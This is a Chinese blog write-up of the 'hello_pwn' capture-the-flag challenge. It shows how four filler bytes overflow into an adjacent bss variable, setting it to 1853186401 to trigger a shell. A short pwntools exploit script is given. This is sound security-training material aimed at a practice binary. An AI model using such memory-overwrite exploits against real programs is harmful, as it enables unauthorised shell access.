标签：攻防 payload sh dword pwn 1853186401 main hello

首发于鄙人博客：传送门

0x00 前言

file checksec已省略。64位elf程序

0x10 步骤

0x11 main函数

在main函数中我们可以看到，它让我们输入unk_601068的值，而如果我们想getshell，那么我们便需要将dword_60106c的值赋为1853186401。

0x11 bss段观察

可以看到这两个数据的距离并不远，所以当我们输入第一个值二点时候，我们便可以先输入4个无关数据，然后再将1853186401的值打包发给dword。即payload为payload = 'a'*4+p64(1853186401)

0x20 exp

from pwn import *
sh = process("./hello_pwn")
payload = 'a'*4+p64(1853186401)
sh.recvuntil("bof")
sh.sendline(payload)
sh.interactive()

• 点赞
• 收藏
• 分享
• • 文章举报

TedLau_W 发布了15 篇原创文章 · 获赞 1 · 访问量 255 私信 关注

标签：攻防,payload,sh,dword,pwn,1853186401,main,hello
来源： https://blog.csdn.net/qq_30204577/article/details/104480466

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。